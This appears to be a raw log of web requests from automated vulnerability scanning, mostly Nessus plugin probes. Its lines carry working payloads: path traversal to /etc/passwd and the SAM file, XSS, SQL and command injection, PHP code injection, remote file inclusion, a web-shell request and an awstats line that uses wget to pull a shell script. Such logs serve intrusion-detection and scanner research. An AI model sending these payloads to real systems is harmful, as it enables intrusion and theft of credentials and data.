/etc/passwd\n/ap58k3ci.cfc?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"ver\\x09>q12267523&rem\\x09\n/gy23xnjq.php3?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n/copying/q33749448&#x26;q3338&#x22;q3338&#x3c;q3338&#x3e;q33749448\n/6dlc2zm9.exe?<script>document.cookie=\"testqpux=4016;\"</script>\n/?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/javascript/reverse.exe\n/john battelle's searchblog-tm/\n/h4bi26jd.dll?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/manager/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/jujgxwav.html?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/examples/jsp/error/search.pl?form=../../../../../../etc/passwd\\x00\n/i2n4v4rl.php3?<script>cross_site_scripting.nasl</script>\n/print_subscription/\n/cgi-914/vssetcookie.exe\n/d5a5renl.cgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/manager/index.php?module=<script>foo</script>\n/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/lmw4r201.nsf?<script>document.cookie=\"testwews=8477;\"</script>\n/hipkz026.exe?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/hrttz9fj.php?<script>document.cookie=\"testtbjy=7334;\"</script>\n/xfkun1ku.x?<script>cross_site_scripting.nasl</script>\n/6n7aacgg.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bmeun223.cfc?<script>document.cookie=\"testhhwu=7044;\"</script>\n/javascript/typo3.exe\n/d5a5renl.do?<script>cross_site_scripting.nasl</script>\n/scripts/d3z7yywpyeoa.php\n/examples/jsp/error/search.php?searchstring=<script>foo</script>\n/lmw4r201.pl?<script>document.cookie=\"testwews=8477;\"</script>\n/scripts/onwkbtts3uj1.cgi\n/en-us/account/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/bin/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/javascript/not.exe\n/scripts/shopsearch.asp?search=yes\n/main.php?stuff=ping;-w;8000;-n;1;1.2.3.4|rem;\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/tduwadykcu.sh+>+/dev/null+&').\"]=1\n/examples/jsp/cal/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/tuwjta1w.idc?<script>document.cookie=\"testpokn=7494;\"</script>\n/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/lite tracker script/\n/l13b77e5.idc?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/help.php?q=\"ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/scripts/shop/orders/orders.txt\n/main.php?logout=\"ping\\x09-w\\x0910000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/t578vqea.php3?<script>document.cookie=\"testsory=7676;\"</script>\n/bin/r.cgi?file=../../../../../../../../../../etc/passwd\n/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,947023198940,4,5,6,7,8,9,10,11--\n/zroo33l4.x?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.96:8080/4dckqcc0acprbz??\n/scripts/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/scriptresource.axd?d=junk\n/yver8r9o.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=&ver;>q66756841&rem;\n/0rufe52p.mscgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/htgrep/file=index.html&hdr=/etc/passwd\n/help.php?q=\"ver >q65533214&rem \n/scs86g1p.jspa?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/help.php?q=;uname >q88998669 #\n/pxagj7n7.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/script/ident/loginliste.php?path_inc=@rfiurl\n/jdx255ea.kspx?<script>document.cookie=\"testziyq=5055;\"</script>\n/en-us/app/xss\n/manager/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/mssql.exe\n/examples/jsp/num/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/examples/jsp/jsp2/el/viewpage.php?file=/etc/passwd\n/9o6g5vkn.do?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/script/param/param.inc.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?\n/b4vng02k.html?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/zmvq66jy.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/2003.exe\n/xfkun1ku.do?<script>cross_site_scripting.nasl</script>\n/u95h6ymu.jsp?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;rm+/tmp/rkejrxdjgj\"\n/main.php?logout=\"|ping;-w;11000;-n;1;4.3.2.1|rem;\n/manager/ovlaunch.exe\n/help.php?q=ver;>q46895114&rem;\n/top.php?stuff=\"\\x0drm q38313114 #\n/yver8r9o.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/htpasswd.tgz\n/readmore.php?config[\"sipssys\"]=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/ht8pn8uq.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/i686v90l.php?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/cgi-bin/docs.php?doc=../jpgraph-1.12.1/docs/index\n/examples/jsp/jsp2/el/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/examples/servlets/servlet/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n/scripts/popup.php?include_path=/etc/passwd\\x00\n/en-us/accountsearch-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/7uz3ok60.cfm?<script>cross_site_scripting.nasl</script>\n/mailman/listinfo/<script>alert('vulnerable')</script>\n/raanw4ia.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/esmozg5d.exe?<script>cross_site_scripting.nasl</script>\n/javascript/document.xls\n/modules.php?name=your_account&op=userinfo&username=bla<script>alert(document.cookie)</script>\n/en-us/account/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/um7xpn15.php?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/search/submit.php?config[\"sipssys\"]=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/0w155a7c.jspa?<script>cross_site_scripting.nasl</script>\n/javascript/mambo.exe\n/bin/cgi-test.exe\n/82q7ywa8.asp?<script>document.cookie=\"testpwew=1315;\"</script>\n/javascript/document.pfx\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908691&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/en-us/i686v90l.nsf?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/email-subscription/\n/3m5knyc4.cfm?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/main.php?stuff=';uname\\x09>q87217698\\x09#\n/help.php?q=\"ping;-w;9000;-n;1;1.2.3.4&rem;\n/main.php?stuff=\";uname #\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+rcx>>esbq\n/examples/jsp/cal/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/061229_leaderscript/\n/cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd\\x00\n/0w155a7c.exe?<script>cross_site_scripting.nasl</script>\n/en-us/dda2qr7j.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331919010','5'--\n/dda2qr7j.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/oie504mr.jsp?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n//q54599877&#38;q3916&#34;q3916&#60;q3916&#62;q54599877\n/vac1l5vm.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+777+/tmp/tduwadykcu.sh').\"]=1\n/dda2qr7j.kspx?<script>cross_site_scripting.nasl</script>\n/scripts/nryr3lvrjnwx.asp\n/javascript/blogs.exe\n/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/no4ghqiguzhst?\\x00\n/en-us/n9xlumt5.nsf?<script>cross_site_scripting.nasl</script>\n/nmw0do67.do?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"&ping,-w,9000,-n,1,4.3.2.1&rem,\n/scripts/patch/index.php\n/ywaxntrx.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script/plugins/phpgacl/admin/index.php?path_inc=@rfiurl\n/o1zj4u9v.x?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/top.php?stuff=\"\\x0arm q36232773 #\n/technetwebcastwhatsnewinscriptingforwindows2003/\n/j4rdyhw8.idc?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/javascript/management.exe\n/phpmyadmin/scripts/setup.php\n/manager/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/en-us/jnv890lt.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/.passwd.as\n/main.php?stuff='\\x0adel q31711746 #\n/opensiteadmin/scripts/classes/databasemanager.php?path=@rfiurl\\x00\n/shell scripts/\n/b4vng02k.php?<script>document.cookie=\"testtrlh=3672;\"</script>\n/o1zj4u9v.aspx?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/scripts/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/javascript/sslvpn.exe\n/82q7ywa8.dll?<script>document.cookie=\"testpwew=1315;\"</script>\n/phpmyadmin/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/examples/servlets/servlet/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/0u75ldxq.htm?<script>cross_site_scripting.nasl</script>\n/scripts/contacts/php?cal_dir=http://xxxxxxxx/\n<script>document.cookie=\"testsory=7676;\"</script>\n/_vti_bin/..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/javascript/dev.exe\n/cgi-bin/zpanel.php?page=/etc/passwd\\x00\n/javascript/.passwd.ws\n/7o5qp766.exe?<script>cross_site_scripting.nasl</script>\n/ewc3rz1l.aspx?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.118:8080/zz5thkvtmlgl?\n/javascript/asp.exe\n/cgi-home/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/tuwjta1w.jspa?<script>document.cookie=\"testpokn=7494;\"</script>\n/0w155a7c.kspx?<script>cross_site_scripting.nasl</script>\n/apavxugx.fts?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/manager/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/cacti/hw3.cgi?daysonly=0).system('id').(\n/e9rx3ya4.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/splunk_413_404error_xss.nasl-1331909104\n/cgi-914/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/top.php?stuff=\";uname >q25742723 #\n/cgi-915/msmmask.exe?mask=/junk334\n/main.php?stuff=uname\\x09>q84571882\\x09#\n/en-us/account/includes/config.php?relative_script_path=http://xxxxxxx\n/scripts/piywzua5hwer.sh\n/nsn/..\\webdemo/fdir.bas\n/en-us/i686v90l.htm?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/examples/jsp/checkbox/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/main.php?logout=\";uname\\x09>q28427886\\x09#\n/main.php?stuff='uname\\x09>q81291893\\x09#\n/scripts/news.mdb\n/search.jsp?q=%\"<script>alert(1332010405)</script>\n/examples/jsp/checkbox/admin/admin.php?sid=0'\n/archive.php?scriptpath=http://192.168.202.96:8080/ipb5ri??\n/cgi-win/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/ewc3rz1l.cfc?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/1qwv2p5p.cgi?<script>document.cookie=\"testvqcy=252;\"</script>\n/iv5vkgam.cgi?<script>document.cookie=\"testfosd=94;\"</script>\n/fcgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/n9xlumt5.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/tracker.exe\n/fcgi-bin/echo.exe?foo=<script>alert('vulnerable')</script>\n/javascript/index.exe\n/phpmyadmin/ion-p.exe?page=../../../../../etc/passwd\n/javascript/jj.exe\n/top.php?stuff=\";sleep\\x0910\\x09#\n/j734qobz.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/0qhcnefz.php3?<script>cross_site_scripting.nasl</script>\n/gy23xnjq.cgi?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=;del\\x09q93759833\\x09#\n/scripts/rwcgi60\n/phpmyadmin/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n/javascript/iisadmpwd.exe\n/j2kdmfw4.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/scripts/lrn28issfuqi.html\n/readmore.php?config[\\\"sipssys\\\"]=@rfiurl\n/main.php?logout=\"\\x0dsleep 7 #\n/scripts/windmail.exe\n/main.php?stuff=&del;q66756841&rem;\n/script19/\n/vignettescriptingnews/\n/en-us/hipkz026.idc?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/javascript/pages.exe\n/scripts/9pen4xzgztjn.cfm\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+4c+cd+21+54+68+69+73+20+70+72+6f+67+72+61+6d+20+63+61+6e+6e+6f+74+20+62+65++>>esbq\n/bemarket/postscript/postscript.php?p_mode=http://cirt.net/rfiinc.txt?\n/search_result.asp?category=all&keyword=sql_error411885577602'&mode=date\n/oie504mr.kspx?<script>document.cookie=\"testtpby=7052;\"</script>\n/169okeyj.pl?<script>document.cookie=\"testxeoi=3573;\"</script>\n/examples/jsp/jsp2/el/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/index.php?c=access&a=login&ref_c=nessus\"><script>alert(1385656235)</script>&ref_a=projectpier_login_page_xss.nasl\"><script>alert(205656505)</script>\n/cgi-bin/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/scripts/qop0sa1auif9.php\n/help.php?q=\"del,q69289112&rem,\n/cgi-bin/admin/configset.php?settings_dir=/etc/passwd\\x00\n/main.php?stuff=;uname\\x09>q16377967\\x09#\n/main.php?logout=\"\\x0ddel\\x09q32424996\\x09#\n/mp's_surgery/\n/33y9gcqq.jsp?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/r3le3om5.aspx?<script>cross_site_scripting.nasl</script>\n/mod_membre/inscription.php?chemin=http://192.168.202.118:8080/2aibfaczmac8??\n/examples/jsp/colors/mlog.html?screen=/etc/passwd\n/en-us/7o5qp766.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"&rm\\x09q66374774&rem\\x09\n/pyscript/\n/fc9t54l7.jsp?<script>document.cookie=\"testggad=2000;\"</script>\n/?<script>document.cookie=\"testbnli=1975;\"</script>\n/help.php?q=\"\\x0auname >q34395972 #\n/main.php?logout=\"ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=@rfiurl\\x00\n/examples/jsp/jsp2/jspx/save.php?file_save=/etc/passwd\n/examples/jsp/num/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/examples/servlets/servlet/sendcard.php?view=1&id='sendcard_sql.nasl\n/javascript/htpasswd.sfish\n/scripts/irbf6nj7oyfh.html\n/index.php?c=access&a=login&ref_c=nessus\"><script>alert(2084986170)</script>&ref_a=projectpier_login_page_xss.nasl\"><script>alert(858687858)</script>\n/cgi-bin/index.php?op=default&date=200607' union select 1,804459550,1,1,1,1,1,1,1,1--&blogid=1\n/scripts/lce0cbkfb8xx.php3\n/top.php?stuff=\"\\x0duname\\x09>q52865653\\x09#\n/d44uk9h2.nsf?<script>document.cookie=\"testmybc=2088;\"</script>\n/cgi/gwweb.exe?help=bad-request\n/index.cfm?fuseaction=category.display&category_id='\n/scripts/rih28haesl0j.pl\n/main.php?logout=\"&ver\\xa0>q69712395&rem\\xa0\n/cgi-exe/texis.exe/junk\n/en-us/account/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/help.php?q=';rm\\x09q26484164\\x09#\n/javascript/.passwd.bz2\n/weq93ppb.php3?<script>cross_site_scripting.nasl</script>\n/javascript/android.exe\n/en-us/jnv890lt.exe?<script>cross_site_scripting.nasl</script>\n/manager/index.php?page=/etc/passwd\\x00\n/managesubscription/\n/7u1pb2xi.mscgi?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/main.php?logout=\"ping\\x09-w\\x099000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/main.php?logout=\"del,q64292722&rem,\n/examples/jsp/checkbox/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/webcgi/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/examples/jsp/error/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/examples/servlets/servlet/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n/cgi-exe/sensepost.exe?/c+dir\n/top.php?stuff=\"ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/w4996nr0.fts?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/javascript/.htpasswd.sfish/\\.\\\n/examples/jsp/num/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/rv98iwjp.jspa?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/help.php?q=\\x0duname >q23688622 #\n/main.php?stuff=\"ping\\x09-w\\x097000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/zln2hm2z.kspx?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/aj3pf49c.asp?<script>document.cookie=\"testnofv=4170;\"</script>\n/h21y8w52.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=|ping;-w;11000;-n;1;1.2.3.4|rem;\n/rv98iwjp.jsp?<script>cross_site_scripting.nasl</script>\n/scripts/nckowqpd4zng.pl\n/applescript/\n/examples/jsp/jsp2/el/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/examples/jsp/colors/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n/main.php?stuff=\"ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/javascript/.passwd.7z\n/6wb70v0b.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/browse.php\n/awstats/awstats.pl?migrate=|echo;wget -p /tmp/  http://192.168.202.102:80/awseggic39wdud9texeq22uh8hvgaa/ptsrmtfadl.sh;echo|awstats457412.txt\n/examples/jsp/checkbox/ion-p.exe?page=../../../../../etc/passwd\n/scripts/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/examples/jsp/colors/index.php?op=default&date=200607' union select 1,450076443,1,1,1,1,1,1,1,1--&blogid=1\n/javascript/tutorial.exe\n/scripts/phptonuke.php?filnavn=/etc/passwd\n/?ilang=eng&sid=2\"<script>alert(411776083444);</script>\n/scripts/test-cgi.bat\n/x2gyorli.mscgi?<script>document.cookie=\"testwhac=3130;\"</script>\n/examples/jsp/error/shoutbox.php?conf=../../../../../../../../etc/passwd\n/xlj7h65o.asp?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/main.php?stuff=\"&ver >q54323675&rem \n/top.php?stuff='&sleep\\x097\\x09#\n/6wb70v0b.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/gy23xnjq.htm?<script>cross_site_scripting.nasl</script>\n/cgi-bin/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir\n/main.php?stuff=\"ver >q73888727&rem \n/jnv890lt.mscgi?<script>cross_site_scripting.nasl</script>\n/javascript/document.pdf\n/en-us/account/shopaddtocart.asp?productid='42\n/admin/index.php?path_to_script=@rfiurl?cmd=ls&path_to_script=@rfiurl?\n/manager/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n/<script>cross_site_scripting.nasl</script>.fts\n/top.php?stuff=&ping;-w;11000;-n;1;1.2.3.4&rem;\n/examples/jsp/sessions/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/scripts/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/8t9v8k7x.exe?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/en-us/esmozg5d.jsp?<script>cross_site_scripting.nasl</script>\n/en-us/account/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../vtigerservice.php\\x00\n/b5xdqgz2.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script//ident/index.php?path_inc=http://cirt.net/rfiinc.txt?\n/phpmyadmin/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/o1zj4u9v.php3?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/main.php?stuff='\\x0ddel q65565224 #\n/edzaia0i.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/poll.exe\n/t3af3tdz.nsf?<script>cross_site_scripting.nasl</script>\n/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/um7xpn15.php?<script>document.cookie=\"testotoy=6142;\"</script>\n/winzip100.exe/\n/scripts/qbch5ojumj32.pl\n/help.php?q=\"ping;-w;9000;-n;1;1.2.3.4|rem;\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3fstuff%3d1861731255&frm_user=&scr_height=&scr_width=q81848235\n//a=\"%3cscript%20src=%27http://www.example.com/test?rnd=q74158412%27%3e%3c%2fscript%3e\";document.writeln(unescape(a))\n/hipkz026.cfm?<script>document.cookie=\"testyrbs=2855;\"</script>\n/7uz3ok60.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/defaults.exe\n/man-cgi?section=0&topic=ls;id\n/ddoworrl.kspx?<script>document.cookie=\"testvlau=8517;\"</script>\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.exe\n/top.php?stuff=\"ping\\x09-w\\x0910000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/examples/jsp/num/cart32.exe\n/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.96:8080/llumt7msyau5y?\n/examples/jsp/sessions/sgdynamo.exe?htname=sgdynamo.exe\n/ny1b3qq4.mscgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/javascript/press.exe\n/examples/jsp/num/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\n/fmnveedu.jsp?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/examples/jsp/jsp2/el/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/manager/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+72+61+72+79+41+77+73+32+5f+33+32+2e+64+6c+6c+00+5d+64+8b+1d+30+00+00+00+8b++>>ctdn\n/7o5qp766.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/web-console.exe\n/webdav/c99.php?act=f&f=wce.exe&ft=exe&d=c:\\\n/inc/formmail.inc.php?script_root=http://192.168.202.118:8080/ghl9il?\n/scripts/rx9ysf2iwv4j.cgi\n/examples/servlets/servlet/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n/javascript/zip.exe\n/hjdzm96v.kspx?<script>document.cookie=\"testbyqe=7474;\"</script>\n/webcgi/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/ao22ww7y.cfc?<script>document.cookie=\"testqppc=8767;\"</script>\n/javascript/document.cs\n/bxnyrhmh.asp?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/recordings/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n/javascript/homepage.exe\n/help.php?q=\"ver,>q58627156&rem,\n/7uz3ok60.exe?<script>cross_site_scripting.nasl</script>\n/openbb/index.php?cid='\n/scripts/index.php?cid='\n/scripts/tomcat_proxy_directory_traversal.nasl1331905219\n/phpmyadmin/search.jsp?q=%\"<script>alert(1331923191)</script>\n/scripts/tradecli.dll\n/scripts/search\n/javascript/2005.exe\n/javascript/script.exe\n/odzk29aa.jsp?<script>document.cookie=\"testtfvh=2141;\"</script>\n/javascript/people.exe\n/examples/jsp/error/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/hrttz9fj.idc?<script>document.cookie=\"testtbjy=7334;\"</script>\n/examples/jsp/jsp2/el/admin/admin.php?sid=0'\n/vwmg565s.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/no-such-file.pl\n/en-us/account/base_qry_common.php?base_path=/etc/passwd\\x00\n/ewc3rz1l.jspa?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/scripts/myphppagetool/doc/admin/index.php?ptinclude-http://xxxxxxxx\n/cgi-bin/www/delivery/ac.php?bannerid=-1332008596+or+1=1+--+';passthru(base64_decode($_server[http_nessus_t6vulpj4]));die;/*\n/esmozg5d.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/if69ddo1.kspx?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/3hlysl2x.idc?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/phpmyadmin/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/scripts/rihzp7swr3p6.html\n/index.php?id='union/**/select/**/0,0,300412621,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/scripts/tinfo.php?id=1331919175\n/s7qus4g3.asp?<script>cross_site_scripting.nasl</script>\n/national lampoon's christmas vaction/\n/ju0u7kfo.mscgi?<script>cross_site_scripting.nasl</script>\n/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/scripts/b0j2ijssh6cu.html\n/rubrique.asp?no=/../../../etc/passwd|55|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/esmozg5d.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/..%5c..%5c..%5c..%5c..%5c../winnt/repair/sam._\n/cgi/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/scripts/ggvfa_wichxq.sh\n/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331905234,4,5\n/scripts/fgos1sb1c1tr.cgi\n/javascript/view-source.exe\n/en-us/jnv890lt.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/aj3pf49c.dll?<script>document.cookie=\"testnofv=4170;\"</script>\n/examples/servlets/servlet/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/phpmyadmin/documentation.html?phpmyadmin=&cat /etc/passwd\n/en-us/h5sc3gxy.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1331904237,89676103 --\n/x2gyorli.jspa?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+555+/tmp/rrqfvzowbk0;').\"]=1\n/static//%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd\n/main.php?logout=\"|sleep 11 #\n/9o6g5vkn.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/index.php?p='nessus\n/static//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\n/main.php?logout='&uname\\x09>q79227952\\x09#\n/cgi-bin/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/transcript/\n/help.php?q=\"&ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/egaet53a.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7u1pb2xi.do?<script>document.cookie=\"testlwwz=718;\"</script>\n///etc/passwd\n/help.php?q=\"\\x0ddel q87848513 